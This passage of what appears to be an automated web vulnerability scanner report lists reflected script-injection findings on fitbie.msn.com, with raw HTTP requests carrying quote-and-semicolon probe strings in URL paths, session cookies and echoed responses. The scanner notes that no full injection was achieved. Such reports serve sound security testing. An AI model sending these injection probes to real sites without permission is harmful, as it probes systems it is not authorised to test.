
Request

GET /modules/taxonomyf1f3c'%3b8d3626cc255/taxonomy.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/taxonomy/term/117
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:40 +0000
ETag: "1297607740-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:40 GMT
Date: Sun, 13 Feb 2011 14:35:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/taxonomyf1f3c';8d3626cc255?destination=node%2Ftaxonomyf1f3c';8d3626cc255&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.27. http://fitbie.msn.com/modules/user/user.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/modules/user/user.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4155b'%3b1d3f4d4d3fe was submitted in the REST URL parameter 2. This input was echoed as 4155b';1d3f4d4d3fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /modules/user4155b'%3b1d3f4d4d3fe/user.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:04 +0000
ETag: "1297606684-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:06 GMT
Date: Sun, 13 Feb 2011 14:18:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/user4155b';1d3f4d4d3fe?destination=node%2Fuser4155b';1d3f4d4d3fe&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.28. http://fitbie.msn.com/node/4411 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/node/4411

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e29'%3bac45156e9a was submitted in the REST URL parameter 2. This input was echoed as c3e29';ac45156e9a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /node/4411c3e29'%3bac45156e9a HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:38:19 +0000
ETag: "1297607899-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43200
Expires: Mon, 14 Feb 2011 02:38:20 GMT
Date: Sun, 13 Feb 2011 14:38:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/4411c3e29';ac45156e9a?destination=node%2F4411c3e29';ac45156e9a&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.29. http://fitbie.msn.com/search/bing [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/search/bing

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb832'%3bf3e4d4f7a7d was submitted in the REST URL parameter 2. This input was echoed as cb832';f3e4d4f7a7d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /search/bingcb832'%3bf3e4d4f7a7d HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:14 +0000
ETag: "1297607834-1"
Content-Type: text/html; charset=utf-8
Expires: Sun, 13 Feb 2011 14:37:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:37:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/bingcb832';f3e4d4f7a7d?destination=node%2Fbingcb832';f3e4d4f7a7d&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.30. http://fitbie.msn.com/sites/all/modules/addtoany/addtoany.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/addtoany/addtoany.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b67a9'%3b056c24d53e8 was submitted in the REST URL parameter 2. This input was echoed as b67a9';056c24d53e8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/allb67a9'%3b056c24d53e8/modules/addtoany/addtoany.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/taxonomy/term/117
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:42 +0000
ETag: "1297607742-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:42 GMT
Date: Sun, 13 Feb 2011 14:35:42 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allb67a9';056c24d53e8?destination=node%2Fallb67a9';056c24d53e8&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.31. http://fitbie.msn.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8c81'%3b3622d6c4815 was submitted in the REST URL parameter 2. This input was echoed as d8c81';3622d6c4815 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/alld8c81'%3b3622d6c4815/modules/cck/modules/fieldgroup/fieldgroup.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:12 +0000
ETag: "1297606692-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:12 GMT
Date: Sun, 13 Feb 2011 14:18:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/alld8c81';3622d6c4815?destination=node%2Falld8c81';3622d6c4815&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.32. http://fitbie.msn.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ba89'%3b90d79f7a70 was submitted in the REST URL parameter 2. This input was echoed as 2ba89';90d79f7a70 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all2ba89'%3b90d79f7a70/modules/cck/theme/content-module.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:09 +0000
ETag: "1297606689-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:10 GMT
Date: Sun, 13 Feb 2011 14:18:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all2ba89';90d79f7a70?destination=node%2Fall2ba89';90d79f7a70&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.33. http://fitbie.msn.com/sites/all/modules/ctools/css/ctools.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/ctools/css/ctools.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a775'%3bddfb1ea9cd2 was submitted in the REST URL parameter 2. This input was echoed as 6a775';ddfb1ea9cd2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all6a775'%3bddfb1ea9cd2/modules/ctools/css/ctools.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:11 +0000
ETag: "1297606691-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:12 GMT
Date: Sun, 13 Feb 2011 14:18:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all6a775';ddfb1ea9cd2?destination=node%2Fall6a775';ddfb1ea9cd2&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.34. http://fitbie.msn.com/sites/all/modules/date/date.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/date/date.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d41d'%3b6155fbf6306 was submitted in the REST URL parameter 2. This input was echoed as 4d41d';6155fbf6306 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all4d41d'%3b6155fbf6306/modules/date/date.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:12 +0000
ETag: "1297606692-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:18:13 GMT
Date: Sun, 13 Feb 2011 14:18:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all4d41d';6155fbf6306?destination=node%2Fall4d41d';6155fbf6306&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.35. http://fitbie.msn.com/sites/all/modules/fbconnect/fbconnect.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/fbconnect/fbconnect.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7781d'%3ba9f35523aa7 was submitted in the REST URL parameter 2. This input was echoed as 7781d';a9f35523aa7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all7781d'%3ba9f35523aa7/modules/fbconnect/fbconnect.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
